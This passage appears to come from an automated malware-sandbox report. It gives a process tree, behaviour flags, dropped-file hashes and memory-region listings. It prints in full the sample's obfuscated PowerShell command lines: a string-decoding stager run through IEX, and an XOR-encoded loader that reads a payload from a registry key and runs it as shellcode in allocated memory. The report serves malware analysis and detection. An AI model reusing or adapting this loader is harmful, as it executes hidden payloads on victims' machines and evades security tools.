Re'InHStKPeCDwUTi:Tr\EntStoJumAbmTieKuludfOriHenAmgLoeOprMirBeeTagSplkueLineu\OuNFoiGacKioSttAliAfnCriMizAreTadSa'Br)Ta.BlPReoCalColSluTixIn;Nu`$riUAmnHucPhoLimTemLaoDinManMieSksQusUn9Be Ra=St FlHRiTHaBko Sm'Si8Do4KiFbe5StCFoEStCaf3HeCYiFslCMaDLaCPlDReCPaFEnCudEAnCChEHaCDi5SuDBl3ChDvi3Kl8Af0Om9NeDVa8Un0BaFDoBskFDy3PrDPr9afDOv3ToDen4LoCCy5SoCTrDWi8IsEShEVe3UnCSsFchCreESpDBe6InCbr5SyDPe2StDRe4ScFSaDSk9PiABo9TaAJaEFr6JoDAs2BaCEjFArCwoDAkELa2ZeCRn1AlDGe3PrCNo5De9Ti6To9Gl4ReFAc3PaDDo4LoDAs2MeCSo9FeCkrEVaCCu7Va8Au8re8su4GeFFo4CaDNa2EmCGa5SoCLi4FiDNv6skDOk4ReCCh5SnCNo4OnCSt5UnCopCWaCRu5KoCPrEMoCdu5Ja8Al9Se'Ta;SpNRubMeeMidUneCesSe9Dr Ko`$RoUBanImcGeoAmmLimHyoSinDenIneResStsDu9We;nu`$SjTSjrOveIndOvvMutSeeSpdBoeBrlSueVinpreGr0Ur Pl=Bo drHAnTKoBBa St'ElFFlBFeFMa3DaDre9MeDRe3AsDun4ArCil5DiCTiDUn8ReESuFYa2AfDPs5faCHaEBeDAn4DeCSd9InCDaDEtCBi5Fr8TiEViEHk9DeCApEboDSn4StCPi5UnDDo2KrCSvFEpDbe0weFMi3BoCSi5UnDUn2VaDOv6AlCko9MuCBr3KuCLa5IsDne3Un8ldEArENeDBaCGe1JoDMi2OvDHy3geCTh8CoCAt1DiCTeCLoFAlDRe9TaAVi9LoAprEAn3BuCVaFInDLn0SiDFl9Fu8Co8Re8Sk4MeFTr5PeCReEPiCPy3BiCCoFSnCSkDReCorDChCTiFPrCNuEAfCIlENoCGl5meDCi3KoDgr3Ge8PrCfe8De0In9Su0Wa8EqCRa8Le0Po8Sk0Un8Ha4ToFmi3ToDTe4UnCEk1KjDPr4GiCGrFNoCMa9LiCOpCAf9Ty3Un8NaCRu8Un0La9Ba3Ab9An6Re9Bu2No8Tu9Ad'he;HoNTebdieskdGeeAfsLa9Ku Ry`$CrTStrSkeSadHevSptPreBldMaeBilSeeNenIleHa0Mi;So`$KlsbriInzNoeAf=Sa`$arUStnKjcOcoBemEkmLaoPanTynUdeFisInsPa.SacPiodiuMenAdtes-Af3Ma6De2ar;In`$FlTNirReeRedRevAutTrePhdPyeSelAmeBanMoeLe1pl Uf=Ct NrHVoTCoBUd Fo'FeFSoBAbFSp3SmDOv9liDIn3ObDSm4KaCTh5ErCOvDOm8VeEAbFUn2MyDba5SyCUnEMeDLa4HeCTo9FoCAfDLeCBr5Af8UdEbiEDa9blCUdEHuDEn4SmCMi5PeDNo2BiCDaFArDIm0OvFOp3MoCud5voDFl2FoDmo6PsCUv9AlCUd3StCKe5BrDTo3Hu8CoEUnEMaDIlCin1HoDAc2AnDJa3TeCfo8NaCBe1VeChoCDuFEmDSr9SiASa9ZoARaELa3SaCBeFStDSo0AqDSc9Un8Fa8Gl8Ov4enFLi5ScCLeEmoCFe3PaCGoFAeCAlDsuCRuDDiCBlFTeCEpESoCflETiCsu5YvDSu3coDHe3Pl8UnCji8Te0No9fe3To9Lo6Fo9As2sh8OrCba8Kr0Di8Ki4PoCpiFFyDIn2unCKv9Pr8IlCKo8sp0Da8Le4TiDFo3KuCSa9LoDCrALyCLa5fr8Me9Fa'dr;InNImbEneKodSkeresLl9Sk Dv`$TiTForPrebodLivHutDyeSedBaeBllKoeVinUneGo1Kn;Ud`$skTSarSkeDidflvPatBleUddToegelNoeKanHveEd2Dr Do=Ta UnHInTLiBTe Fr'Co8Su4PrDBi6WhCor1GuDHo2UnFBeFClDBl2PlDIr5ShCBaEAcCGeDTrCTe5Di8Va0Ls9TwDTr8Ro0SeFEkBStFVi3SyDFu9TeDBi3SkDNu4ovCHe5FoCMiDud8ChESiFIn2UbDBr5RaCAnELaDAr4hoCCr9ToCUkDPoCSm5Ur8AbEGrESt9HeCAvEDiDTe4BlCKl5UaDda2diCArFAnDde0ReFFu3jeCEx5BeDLa2KaDAc6ReCFr9SyCMa3beCKe5CiDAf3Re8RaEAfEBlDAnCPo1BeDGa2ViDGr3AfCSa8VoCSk1CoCAfCCyFFiDOp9RoAAf9SaAMoECo7HjCUd5VaDHy4EnEky4LeCBo5raCEpCcaCun5SuCGr7glCho1BiDbu4SyCEn5FyEin6BrCAnFKrDBr2PrEDi6GuDFi5InCOvEMaCBi3ReDRu4DaCKo9LaCNeFCrCpaEEuFSt0SoCMuFReCNu9doCHiEDiDMo4GaCHi5TaDUn2Sv8Si8Sk8Ty4ExFAt3SyDFi4MuCPe1SpDVe4ThCFiFGnCId9InCOsCFr9Bu3Ma8BrCUn8Be0Pr8Kr8StELa7peEBe4HaFTe4Ag8Ve0BrERe0Kl8Bi8BoFPrBPoEMa9BeCSmEUdDSy4VaFSi0HiDKa4ThDUn2RaFBiDOm8UnCRaFDrBUtERo9LeCThEetDSu4DeFSt0ImDSu4meDga2ScFApDOu8Ko9ic8ti0Ga8Ag8SnFCoBNoFMi6ChCUsFBlCNo9ReCMo4KoFFrDGl8St9Di8Re9pa8He9Se'Uf;MaNPebCoeMydAmePusWa9Qu Ud`$SoTTrrPyeRodSpvDitSueSudBjeBllreetinReeBe2pi;Ce`$FoTTarseeScdNevVitCaeUndImeColDieAnnDoeGu3Ko op=ra GyHBrTIrBCr fl'Co8Fo4RuDTr6EfCHa1AfDMu2frFElFStDTo2SuDPe5UnCUdERoCLiDKuCCh5Ac8WeETaEAb9StCHuEUnDSp6ApCMeFFoCMyBEtCan5Bl8Pi8Ac8Sk4FaCEsFImDFo2TaCCy9No8EpCTr8Lo4SeDKi6CoCSk1SdDTh2BrFJeFOuCBrEOrDCh4Fi8Sv9Bi'Ba;StNSkbFleSvdUneQusDe9un Ba`$BjTFirSteBudStvNitLneendSneLilHeeOrnGream3Ra#St;""";;Function Tredvtedelene9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Bravaders = $Bravaders + $HS.Substring($i, 1); } $Bravaders;}$trresnors0 = Tredvtedelene9 'HiIElESeXTi ';$trresnors1= Tredvtedelene9 $Pigs;if([IntPtr]::size -eq 8){ start-job { param($a) powershell $a } -RunAs32 -Argument $trresnors1 | wait-job | Receive-Job;}else{ & ($trresnors0) $trresnors1;};;;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 160); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Yndighedens0=HTB 'F3D9D3D4C5CD8EC4CCCC';$Yndighedens1=HTB 'EDC9C3D2CFD3CFC6D48EF7C9CE93928EF5CED3C1C6C5EEC1D4C9D6C5EDC5D4C8CFC4D3';$Yndighedens2=HTB 'E7C5D4F0D2CFC3E1C4C4D2C5D3D3';$Yndighedens3=HTB 'F3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EE8C1CEC4CCC5F2C5C6';$Yndighedens4=HTB 'D3D4D2C9CEC7';$Yndighedens5=HTB 'E7C5D4EDCFC4D5CCC5E8C1CEC4CCC5';$Yndighedens6=HTB 'F2F4F3D0C5C3C9C1CCEEC1CDC58C80E8C9C4C5E2D9F3C9C78C80F0D5C2CCC9C3';$Yndighedens7=HTB 'F2D5CED4C9CDC58C80EDC1CEC1C7C5C4';$Yndighedens8=HTB 'F2C5C6CCC5C3D4C5C4E4C5CCC5C7C1D4C5';$Yndighedens9=HTB 'E9CEEDC5CDCFD2D9EDCFC4D5CCC5';$Nbedes0=HTB 'EDD9E4C5CCC5C7C1D4C5F4D9D0C5';$Nbedes1=HTB 'E3CCC1D3D38C80F0D5C2CCC9C38C80F3C5C1CCC5C48C80E1CED3C9E3CCC1D3D38C80E1D5D4CFE3CCC1D3D3';$Nbedes2=HTB 'E9CED6CFCBC5';$Nbedes3=HTB 'F0D5C2CCC9C38C80E8C9C4C5E2D9F3C9C78C80EEC5D7F3CCCFD48C80F6C9D2D4D5C1CC';$Nbedes4=HTB 'F6C9D2D4D5C1CCE1CCCCCFC3';$Nbedes5=HTB 'CED4C4CCCC';$Nbedes6=HTB 'EED4F0D2CFD4C5C3D4F6C9D2D4D5C1CCEDC5CDCFD2D9';$Nbedes7=HTB 'E9E5F8';$Nbedes8=HTB 'FC';Set-Alias -name Nbedes9 -value $Nbedes7;function fkp {Param ($v_m, $v_p) ;$Uncommonness0 =HTB '84D6D5CECD809D8088FBE1D0D0E4CFCDC1C9CEFD9A9AE3D5D2D2C5CED4E4CFCDC1C9CE8EE7C5D4E1D3D3C5CDC2CCC9C5D3888980DC80F7C8C5D2C58DEFC2CAC5C3D480DB8084FF8EE7CCCFC2C1CCE1D3D3C5CDC2CCD9E3C1C3C8C5808DE1CEC48084FF8EECCFC3C1D4C9CFCE8EF3D0CCC9D48884EEC2C5C4C5D39889FB8D91FD8EE5D1D5C1CCD38884F9CEC4C9C7C8C5C4C5CED3908980DD898EE7C5D4F4D9D0C58884F9CEC4C9C7C8C5C4C5CED39189';Nbedes9 $Uncommonness0;$Uncommonness5 = HTB '84D6C1D2FFC7D0C1809D8084D6D5CECD8EE7C5D4EDC5D4C8CFC48884F9CEC4C9C7C8C5C4C5CED3928C80FBF4D9D0C5FBFDFD80E08884F9CEC4C9C7C8C5C4C5CED3938C8084F9CEC4C9C7C8C5C4C5CED3948989';Nbedes9 $Uncommonness5;$Uncommonness1 = HTB 'D2C5D4D5D2CE8084D6C1D2FFC7D0C18EE9CED6CFCBC58884CED5CCCC8C80E088FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EE8C1CEC4CCC5F2C5C6FD88EEC5D78DEFC2CAC5C3D480F3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EE8C1CEC4CCC5F2C5C68888EEC5D78DEFC2CAC5C3D480E9CED4F0D4D2898C808884D6D5CECD8EE7C5D4EDC5D4C8CFC48884F9CEC4C9C7C8C5C4C5CED39589898EE9CED6CFCBC58884CED5CCCC8C80E08884D6FFCD898989898C8084D6FFD08989';Nbedes9 $Uncommonness1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Uncommonness2 = HTB '84F6F4E2809D80FBE1D0D0E4CFCDC1C9CEFD9A9AE3D5D2D2C5CED4E4CFCDC1C9CE8EE4C5C6C9CEC5E4D9CEC1CDC9C3E1D3D3C5CDC2CCD98888EEC5D78DEFC2CAC5C3D480F3D9D3D4C5CD8EF2C5C6CCC5C3D4C9CFCE8EE1D3D3C5CDC2CCD9EEC1CDC58884F9CEC4C9C7C8C5C4C5CED39889898C80FBF3D9D3D4C5CD8EF2C5C6CCC5C3D4C9CFCE8EE5CDC9D48EE1D3D3C5CDC2CCD9E2D5C9CCC4C5D2E1C3C3C5D3D3FD9A9AF2D5CE898EE4C5C6C9CEC5E4D9CEC1CDC9C3EDCFC4D5CCC58884F9CEC4C9C7C8C5C4C5CED3998C8084C6C1CCD3C5898EE4C5C6C9CEC5F4D9D0C58884EEC2C5C4C5D3908C8084EEC2C5C4C5D3918C80FBF3D9D3D4C5CD8EEDD5CCD4C9C3C1D3D4E4C5CCC5C7C1D4C5FD89';Nbedes9 $Uncommonness2;$Uncommonness3 = HTB '84F6F4E28EE4C5C6C9CEC5E3CFCED3D4D2D5C3D4CFD28884F9CEC4C9C7C8C5C4C5CED3968C80FBF3D9D3D4C5CD8EF2C5C6CCC5C3D4C9CFCE8EE3C1CCCCC9CEC7E3CFCED6C5CED4C9CFCED3FD9A9AF3D4C1CEC4C1D2C48C8084D6C1D2FFD0C1D2C1CDC5D4C5D2D3898EF3C5D4E9CDD0CCC5CDC5CED4C1D4C9CFCEE6CCC1C7D38884F9CEC4C9C7C8C5C4C5CED39789';Nbedes9 $Uncommonness3;$Uncommonness4 = HTB '84F6F4E28EE4C5C6C9CEC5EDC5D4C8CFC48884EEC2C5C4C5D3928C8084EEC2C5C4C5D3938C8084D6D2D48C8084D6C1D2FFD0C1D2C1CDC5D4C5D2D3898EF3C5D4E9CDD0CCC5CDC5CED4C1D4C9CFCEE6CCC1C7D38884F9CEC4C9C7C8C5C4C5CED39789';Nbedes9 $Uncommonness4;$Uncommonness5 = HTB 'D2C5D4D5D2CE8084F6F4E28EE3D2C5C1D4C5F4D9D0C58889';Nbedes9 $Uncommonness5 ;}$kk = HTB 'CBC5D2CEC5CC9392';$Uncommonness6 = HTB '84D6C1D2FFD6C1809D80FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EEDC1D2D3C8C1CCFD9A9AE7C5D4E4C5CCC5C7C1D4C5E6CFD2E6D5CEC3D4C9CFCEF0CFC9CED4C5D28888C6CBD08084CBCB8084EEC2C5C4C5D394898C8088E7E4F480E088FBE9CED4F0D4D2FD8C80FBF5E9CED49392FD8C80FBF5E9CED49392FD8C80FBF5E9CED49392FD898088FBE9CED4F0D4D2FD898989';Nbedes9 $Uncommonness6;$var_nt = fkp $Nbedes5 $Nbedes6;$Uncommonness7 = HTB '84F3D4C1D4CFC9CC93809D8084D6C1D2FFD6C18EE9CED6CFCBC588FBE9CED4F0D4D2FD9A9AFAC5D2CF8C809396928C8090D8939090908C8090D8949089';Nbedes9 $Uncommonness7;$Uncommonness8 = HTB '84CFD2C9809D8084D6C1D2FFD6C18EE9CED6CFCBC588FBE9CED4F0D4D2FD9A9AFAC5D2CF8C8090D89190909090908C8090D8939090908C8090D89489';Nbedes9 $Uncommonness8;$Tredvtedelene=(Get-ItemProperty -Path 'HKCU:\tommelfingerreglen\Nicotinized').Pollux;$Uncommonness9 = HTB '84F5CEC3CFCDCDCFCECEC5D3D3809D80FBF3D9D3D4C5CD8EE3CFCED6C5D2D4FD9A9AE6D2CFCDE2C1D3C59694F3D4D2C9CEC78884F4D2C5C4D6D4C5C4C5CCC5CEC589';Nbedes9 $Uncommonness9;$Tredvtedelene0 = HTB 'FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EEDC1D2D3C8C1CCFD9A9AE3CFD0D98884F5CEC3CFCDCDCFCECEC5D3D38C80908C808084F3D4C1D4CFC9CC938C8093969289';Nbedes9 $Tredvtedelene0;$size=$Uncommonness.count-362;$Tredvtedelene1 = HTB 'FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EEDC1D2D3C8C1CCFD9A9AE3CFD0D98884F5CEC3CFCDCDCFCECEC5D3D38C809396928C8084CFD2C98C8084D3C9DAC589';Nbedes9 $Tredvtedelene1;$Tredvtedelene2 = HTB '84D6C1D2FFD2D5CECDC5809D80FBF3D9D3D4C5CD8EF2D5CED4C9CDC58EE9CED4C5D2CFD0F3C5D2D6C9C3C5D38EEDC1D2D3C8C1CCFD9A9AE7C5D4E4C5CCC5C7C1D4C5E6CFD2E6D5CEC3D4C9CFCEF0CFC9CED4C5D28884F3D4C1D4CFC9CC938C8088E7E4F480E088FBE9CED4F0D4D2FD8CFBE9CED4F0D4D2FD898088FBF6CFC9C4FD898989';Nbedes9 $Tredvtedelene2;$Tredvtedelene3 = HTB '84D6C1D2FFD2D5CECDC58EE9CED6CFCBC58884CFD2C98C84D6C1D2FFCED489';Nbedes9 $Tredvtedelene3#"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD593678e82d776686aa54c42b8a98e6cbc
SHA1802939dfed99ac74814c4371388b204c5810241d
SHA256da32a79a8e04cbafb1c5980b3d6225f4705010df5eb45d464cd5bf6b642d7841
SHA5120b412a1e11c0639d72f6a58c661ecc43da021c010c4d1e66051c5a376ebab287480bbf663345c9bd2a79ec3a35a9788cf04d74d612449f76fe2c87576cd13520
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
55KB
MD5e88ba838ebe9eb37911d2853477d7d12
SHA1549e6e9086fb77fe2846a656d6efaaa4df7910f2
SHA2565ccd5470be744dcf89df041557247fb358c835150d74fd6e1114d22189b845cc
SHA512b3af68b0d253b4a733d6bec8a5685000752c8adf3fdc3209f9c9a15ecd965d35749b0e0091b5ae1b77b07d650703bc7a9478bb829d5c3bf88055e2e2c3e4d16f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
55KB
MD5b40072f437946ad68d49c87939bb0ba8
SHA106a414bac8873528add8e27abfdb473c1cac1988
SHA256b6077542ca11f6aa897dab1bc46b53758506ecd679cf3c74648126f6f3f9ef31
SHA51295ac5f6818396a15b486690821499e16f84f991070240e04670970837123172161f2784fd6cd154694b84de48a741823e7131ef565a717f60e89f4deb08d8f37
-
memory/916-135-0x00007FF9CD470000-0x00007FF9CDF31000-memory.dmpFilesize
10.8MB
-
memory/916-136-0x000001306E640000-0x000001306E7B6000-memory.dmpFilesize
1.5MB
-
memory/916-137-0x000001306E9D0000-0x000001306EBDA000-memory.dmpFilesize
2.0MB
-
memory/916-132-0x0000000000000000-mapping.dmp
-
memory/916-134-0x00007FF9CD470000-0x00007FF9CDF31000-memory.dmpFilesize
10.8MB
-
memory/916-133-0x000001306D890000-0x000001306D8B2000-memory.dmpFilesize
136KB
-
memory/1416-149-0x0000000007C10000-0x0000000007CA6000-memory.dmpFilesize
600KB
-
memory/1416-155-0x0000000007B10000-0x000000000818A000-memory.dmpFilesize
6.5MB
-
memory/1416-153-0x0000000007B10000-0x000000000818A000-memory.dmpFilesize
6.5MB
-
memory/1416-151-0x0000000008DC0000-0x0000000009364000-memory.dmpFilesize
5.6MB
-
memory/1416-150-0x0000000007A40000-0x0000000007A62000-memory.dmpFilesize
136KB
-
memory/1416-145-0x0000000000000000-mapping.dmp
-
memory/4720-138-0x0000000000000000-mapping.dmp
-
memory/4720-148-0x0000000001060000-0x000000000107A000-memory.dmpFilesize
104KB
-
memory/4720-147-0x0000000007740000-0x0000000007DBA000-memory.dmpFilesize
6.5MB
-
memory/4720-144-0x0000000006770000-0x000000000678E000-memory.dmpFilesize
120KB
-
memory/4720-143-0x0000000005F70000-0x0000000005FD6000-memory.dmpFilesize
408KB
-
memory/4720-142-0x0000000005F00000-0x0000000005F66000-memory.dmpFilesize
408KB
-
memory/4720-141-0x0000000005810000-0x0000000005832000-memory.dmpFilesize
136KB
-
memory/4720-140-0x00000000058D0000-0x0000000005EF8000-memory.dmpFilesize
6.2MB
-
memory/4720-139-0x0000000003020000-0x0000000003056000-memory.dmpFilesize
216KB